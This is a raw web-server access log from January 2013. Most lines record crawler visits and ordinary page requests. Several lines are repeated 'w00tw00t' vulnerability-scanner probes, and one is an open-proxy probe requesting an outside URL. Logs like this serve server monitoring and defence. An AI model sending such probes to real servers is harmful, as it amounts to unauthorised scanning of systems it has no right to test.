206.253.226.18 - - [25/Jan/2013:11:23:25 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
206.253.226.18 - - [25/Jan/2013:13:05:17 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
31.3.228.199 - - [25/Jan/2013:13:20:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
188.40.82.78 - - [25/Jan/2013:14:27:30 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0"
188.40.82.78 - - [25/Jan/2013:14:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0"
94.102.51.246 - - [25/Jan/2013:15:09:13 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5CO HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
106.186.16.164 - - [25/Jan/2013:15:40:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"
141.8.147.1 - - [25/Jan/2013:17:34:11 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
173.31.74.145 - - [25/Jan/2013:18:45:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.31.74.145 - - [25/Jan/2013:18:46:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [25/Jan/2013:19:02:50 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
141.8.147.1 - - [25/Jan/2013:20:01:12 +0100] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
206.253.226.18 - - [25/Jan/2013:20:42:07 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
206.253.226.23 - - [25/Jan/2013:21:31:05 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
157.55.35.113 - - [25/Jan/2013:21:37:06 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
